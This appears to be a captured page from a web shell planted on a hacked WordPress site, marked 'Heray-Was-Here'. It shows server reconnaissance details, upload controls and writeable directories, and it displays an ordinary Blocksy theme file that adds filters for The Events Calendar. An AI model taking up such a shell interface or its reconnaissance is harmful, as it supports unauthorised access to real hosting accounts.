Heray-Was-Here
Server : LiteSpeed
System : Linux uk-fast-web1372.main-hosting.eu 4.18.0-553.121.1.lve.el8.x86_64 #1 SMP Thu Apr 30 16:40:41 UTC 2026 x86_64
User : u390967363 ( 390967363)
PHP Version : 8.2.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
Directory :  /home/u390967363/public_html/wp-content/themes/blocksy/inc/integrations/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/u390967363/public_html/wp-content/themes/blocksy/inc/integrations/tribe-events.php
<?php

add_filter(
	'tribe_get_option_tribeEventsTemplate',
	function ($value) {
		return 'default';
	}
);

add_filter(
	'tec_events_display_settings_tab_fields',
	function ($fields) {
		if (isset($fields['tribeEventsTemplate'])) {
			$fields['tribeEventsTemplate']['conditional'] = false;
		}

		return $fields;
	}
);

add_filter(
	'tribe_events_views_v2_view_html_classes',
	function ($classes) {
		return array_filter($classes, function ($class) {
			return $class !== 'alignwide';
		});
	},
	50
);

add_filter(
	'blocksy:editor:post_types_for_rest_field',
	function ($post_types) {
		$post_types[] = 'tribe_events';

		return $post_types;
	}
);

add_filter(
	'blocksy:editor:post_meta_options',
	function ($options, $post_type) {
		if ($post_type !== 'tribe_events') {
			return $options;
		}

		return blocksy_get_options('integrations/the-events-calendar/meta');
	},
	10,
	2
);

Hry